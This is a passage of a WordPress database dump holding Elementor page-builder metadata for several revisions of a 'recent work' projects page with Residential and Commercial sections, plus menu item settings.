projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2565,4687,'_elementor_page_assets','a:0:{}'),(2566,4687,'_elementor_css','a:6:{s:4:\"time\";i:1668398450;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2567,4688,'_wp_page_template','elementor_header_footer'),(2568,4688,'_elementor_edit_mode','builder'),(2569,4688,'_elementor_template_type','wp-page'),(2570,4688,'_elementor_version','3.6.6'),(2571,4688,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false}]'),(2572,4688,'_elementor_page_assets','a:0:{}'),(2573,4688,'_elementor_css','a:6:{s:4:\"time\";i:1668398450;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2574,4689,'_wp_page_template','elementor_header_footer'),(2575,4689,'_elementor_edit_mode','builder'),(2576,4689,'_elementor_template_type','wp-page'),(2577,4689,'_elementor_version','3.6.6'),(2578,4689,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false}]'),(2579,4689,'_elementor_page_assets','a:0:{}'),(2580,4689,'_elementor_css','a:6:{s:4:\"time\";i:1668398450;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2590,4691,'_menu_item_type','post_type'),(2591,4691,'_menu_item_menu_item_parent','4715'),(2592,4691,'_menu_item_object_id','4681'),(2593,4691,'_menu_item_object','page'),(2594,4691,'_menu_item_target',''),(2595,4691,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2596,4691,'_menu_item_xfn',''),(2597,4691,'_menu_item_url',''),(2608,1354,'_elementor_css','a:6:{s:4:\"time\";i:1668398597;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:3;s:7:\"ovaicon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2611,4693,'_wp_page_template','elementor_header_footer'),(2612,4693,'_elementor_edit_mode','builder'),(2613,4693,'_elementor_template_type','wp-page'),(2614,4693,'_elementor_version','3.8.1'),(2615,4693,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false}]'),(2616,4693,'_elementor_page_assets','a:0:{}'),(2617,4693,'_elementor_css','a:6:{s:4:\"time\";i:1668398638;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2618,4694,'_wp_page_template','elementor_header_footer'),(2619,4694,'_elementor_edit_mode','builder'),(2620,4694,'_elementor_template_type','wp-page'),(2621,4694,'_elementor_version','3.8.1'),(2622,4694,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false}]'),(2623,4694,'_elementor_page_assets','a:0:{}'),(2624,4694,'_elementor_css','a:6:{s:4:\"time\";i:1668398638;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2625,4695,'_wp_page_template','elementor_header_footer'),(2626,4695,'_elementor_edit_mode','builder'),(2627,4695,'_elementor_template_type','wp-page'),(2628,4695,'_elementor_version','3.8.1'),(2629,4695,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2630,4695,'_elementor_page_assets','a:0:{}'),(2631,4695,'_elementor_css','a:6:{s:4:\"time\";i:1668398638;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2632,4696,'_wp_page_template','elementor_header_footer'),(2633,4696,'_elementor_edit_mode','builder'),(2634,4696,'_elementor_template_type','wp-page'),(2635,4696,'_elementor_version','3.8.1'),(2636,4696,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2637,4696,'_elementor_page_assets','a:0:{}'),(2638,4697,'_wp_page_template','elementor_header_footer'),(2639,4697,'_elementor_edit_mode','builder'),(2640,4697,'_elementor_template_type','wp-page'),(2641,4697,'_elementor_version','3.8.1'),(2642,4697,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2643,4697,'_elementor_page_assets','a:0:{}'),(2644,4698,'_wp_page_template','elementor_header_footer'),(2645,4698,'_elementor_edit_mode','builder'),(2646,4698,'_elementor_template_type','wp-page'),(2647,4698,'_elementor_version','3.8.1'),(2648,4698,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2649,4698,'_elementor_page_assets','a:0:{}'),(2652,4700,'_wp_page_template','elementor_header_footer'),(2653,4700,'_elementor_edit_mode','builder'),(2654,4700,'_elementor_template_type','wp-page'),(2655,4700,'_elementor_version','3.8.1'),(2656,4700,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2657,4700,'_elementor_page_assets','a:0:{}'),(2658,4701,'_wp_page_template','elementor_header_footer'),(2659,4701,'_elementor_edit_mode','builder'),(2660,4701,'_elementor_template_type','wp-page'),(2661,4701,'_elementor_version','3.8.1'),(2662,4701,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding 